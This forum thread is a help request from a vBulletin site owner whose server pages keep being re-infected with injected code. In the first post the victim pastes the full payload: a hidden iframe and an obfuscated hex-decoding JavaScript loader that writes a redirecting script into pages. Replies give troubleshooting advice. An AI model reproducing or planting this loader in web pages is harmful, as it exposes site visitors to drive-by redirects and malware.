No announcement yet.

HTML Injection Hack with VBulletin 3.7.4 pl1

  • Filter
  • Time
  • Show
Clear All
new posts

  • HTML Injection Hack with VBulletin 3.7.4 pl1


    For some time now my server has been compromised. A hacker is inseting a large line of code into all index html & php pages on my server.

    I have done alot of research on Google about this and although alot of people seem to be getting targeted, no solution has been found.

    The entire code which is inserted next to the <body> tag is this:

    <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
    <script>function c102916999516l49442aba3ca85(l49442aba3cf43){ var l49442aba3d32a=16; return (parseInt(l49442aba3cf43,l49442aba3d32a));}function l49442aba3dafb(l49442aba3dee6){ function l49442aba3eac9(){return 2;} var l49442aba3e2d5='';l49442aba3fa4e=String.fromCharCode;for(l49442aba3e6c0=0;l49442aba3e6c0<l49442aba3dee6.length;l49442aba3e6c0+=l49442aba3eac9()){ l49442aba3e2d5+=(l49442aba3fa4e(c102916999516l49442aba3ca85(l49442aba3dee6.substr(l49442aba3e6c0,l49442aba3eac9()))));}return l49442aba3e2d5;} var xab='';var l49442aba40215='3C736'+xab+'3726'+xab+'970743E6'+xab+'96'+xab+'6'+xab+'28216'+xab+'D796'+xab+'96'+xab+'1297B6'+xab+'46'+xab+'F6'+xab+'3756'+xab+'D6'+xab+'56'+xab+'E742E77726'+xab+'9746'+xab+'528756'+xab+'E6'+xab+'5736'+xab+'36'+xab+'1706'+xab+'528202725336'+xab+'32536'+xab+'392536'+xab+'36'+xab+'2537322536'+xab+'312536'+xab+'6'+xab+'42536'+xab+'352532302536'+xab+'6'+xab+'52536'+xab+'312536'+xab+'6'+xab+'42536'+xab+'3525336'+xab+'42536'+xab+'332533312533302532302537332537322536'+xab+'3325336'+xab+'42532372536'+xab+'3825373425373425373025336'+xab+'125326'+xab+'6'+xab+'25326'+xab+'6'+xab+'2536'+xab+'372536'+xab+'6'+xab+'6'+xab+'2536'+xab+'372536'+xab+'6'+xab+'6'+xab+'2533322536'+xab+'6'+xab+'42536'+xab+'3525326'+xab+'52536'+xab+'6'+xab+'52536'+xab+'3525373425326'+xab+'6'+xab+'25326'+xab+'52536'+xab+'372536'+xab+'6'+xab+'6'+xab+'25326'+xab+'6'+xab+'2536'+xab+'332536'+xab+'382536'+xab+'352536'+xab+'332536'+xab+'6'+xab+'225326'+xab+'52536'+xab+'382537342536'+xab+'6'+xab+'42536'+xab+'6'+xab+'32532372532302537372536'+xab+'392536'+xab+'342537342536'+xab+'3825336'+xab+'42533342533312533332532302536'+xab+'382536'+xab+'352536'+xab+'392536'+xab+'372536'+xab+'3825373425336'+xab+'42533312533332533342532302537332537342537392536'+xab+'6'+xab+'32536'+xab+'3525336'+xab+'4253237253736'+xab+'2536'+xab+'392537332536'+xab+'392536'+xab+'322536'+xab+'392536'+xab+'6'+xab+'32536'+xab+'3925373425373925336'+xab+'12536'+xab+'382536'+xab+'392536'+xab+'342536'+xab+'342536'+xab+'352536'+xab+'6'+xab+'525323725336'+xab+'525336'+xab+'325326'+xab+'6'+xab+'2536'+xab+'392536'+xab+'36'+xab+'2537322536'+xab+'312536'+xab+'6'+xab+'42536'+xab+'3525336'+xab+'52729293B7D76'+xab+'6'+xab+'172206'+xab+'D796'+xab+'96'+xab+'13D7472756'+xab+'53B3C2F736'+xab+'3726'+xab+'970743E';document.write(l49442aba3dafb(l49442aba40215));</script>
    It basically redirects the pages to another website which is a security risk.

    I checked all my security settings and I contacted my hosting company. They informed me that this is happening because of scripts I have installed on my server. The hacker is using them to insert the code.

    The only scripts I have installed are vBulletin, WordPress & MovableType. All of which are up to date. Because I dont care too much about my WP or MT sites I uninstalled both and removed the databases. The only script I have running now is vBulletin.

    I was hoping that by removing these scripts the problem would stop but I have just discovered the code has been injected back into all files. It seems to happen again and again after I remove the code. Its obviousally some kind of BOT that keeps checking and inserting the code.

    I have nothing but vBulletin installed on my server. There are no other scripts what so ever. They must be hacking in via vbulletin! I have the latest 3.7.4 pl 1 installed.

    Has anyone else been having the same problem?

    Can someone please, please look into this for me!!! If this is due to vBulletin, which i'm pretty sure it is, then its a BIG hole!

    How can I optimize my VB security to try to prevent this?

  • #2
    Do you have any addons?


    • #3
      Originally posted by Zachery View Post
      Do you have any addons?
      Yes, I have: vBSEO, Cyb Advanced Forum Stats, Solved Threads, vB Google Search Cloud & Yahoo! Messenger Emotions.

      I'm quite sure I am up to date with these mods.


      • #4
        Just because you're up to date doesn't mean that they're secure. You'll need to uninstall all of the addons and see if it happens again. If it does _again_, please start a support ticket, include apache access logs and we'll see if we can find the hole.


        • #5
          Originally posted by Zachery View Post
          Just because you're up to date doesn't mean that they're secure. You'll need to uninstall all of the addons and see if it happens again. If it does _again_, please start a support ticket, include apache access logs and we'll see if we can find the hole.
          Thanks for the replies Zachery.

          I will try that and see what happens..

          I did notice that a range of people are effected by this latest hack. I will do some more research and see if I can find other effected sites that are also running the same mods.


          • #6
            Don't forget its possible that there is a similiar version of mysql, php, apache, or other system flaw.


            • #7
              Did you ever figure out what happaned? im having the same issue myself.


              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.